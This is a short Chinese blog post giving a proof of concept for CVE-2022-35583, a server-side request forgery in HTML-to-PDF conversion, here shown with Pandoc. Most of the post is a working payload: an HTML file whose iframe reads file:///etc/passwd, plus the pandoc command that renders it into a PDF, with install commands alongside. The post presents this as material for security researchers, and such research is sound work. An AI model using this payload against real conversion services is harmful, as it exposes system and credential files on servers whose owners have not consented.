Wkhtmltopdf SSRF漏洞利用详解

本文详细介绍了Wkhtmltopdf中CVE-2022-35583服务器端请求伪造漏洞的利用方法,包含完整的Payload示例和Pandoc转换命令,帮助安全研究人员理解该高危漏洞的攻击原理。

CVE-2022-35583 Pandoc SSRF POC

JGM Pandoc v3.6.4中存在服务器端请求伪造(SSRF)漏洞,攻击者可通过注入特制的iframe来获取访问权限并危害整个基础设施。

安装Pandoc 

1
2
3
4
5
6

# MacOS
brew install pandoc
# Ubuntu/Debain
apt install pandoc
# CentOS
yum install pandoc

Payload 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2022-35583 Proof Of Concept</title>
</head>
<body>
    <h1>CVE-2022-35583 Proof Of Concept</h1>
    <iframe src="file:///etc/passwd"></iframe>
</body>
</html>

使用pandoc将payload转换为pdf 

1

pandoc payload.html -o output1.pdf
comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次